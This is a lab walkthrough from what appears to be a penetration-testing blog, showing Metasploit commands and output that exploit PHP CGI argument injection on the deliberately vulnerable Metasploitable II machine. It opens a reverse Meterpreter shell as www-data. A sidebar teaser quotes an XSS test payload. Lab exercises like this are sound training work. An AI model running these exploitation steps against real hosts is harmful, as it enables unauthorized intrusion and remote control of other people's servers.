Thursday, February 6, 2020

Metasploitable II: PHP CGI Argument Injection

This version of apache webserver is vulnerable with the version of PHP which is installed. You can see the vulnerable version information by looking at the phpinfo page.

Its now time to exploit the vulnerablity. Lets load up metasploit and use the module exploit/multi/http/php_cgi_arg_injection on the remote host.

msf5 > use exploit/multi/http/php
use exploit/multi/http/php_cgi_arg_injection             use exploit/multi/http/phpmyadmin_3522_backdoor
use exploit/multi/http/php_utility_belt_rce              use exploit/multi/http/phpmyadmin_lfi_rce
use exploit/multi/http/php_volunteer_upload_exec         use exploit/multi/http/phpmyadmin_null_termination_exec
use exploit/multi/http/phpfilemanager_rce                use exploit/multi/http/phpmyadmin_preg_replace
use exploit/multi/http/phpldapadmin_query_engine         use exploit/multi/http/phpscheduleit_start_date
use exploit/multi/http/phpmailer_arg_injection           use exploit/multi/http/phptax_exec
use exploit/multi/http/phpmoadmin_exec                   use exploit/multi/http/phpwiki_ploticus_exec
msf5 > use exploit/multi/http/php_cgi_arg_injection.
msf5 exploit(multi/http/php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLESK        false            yes       Exploit Plesk
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
   URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
   VHOST                         no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/php_cgi_arg_injection) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:48979) at 2020-02-07 00:32:29 -0700

meterpreter > shell
Process 5437 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

As you can see we got a shell on the remote host.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...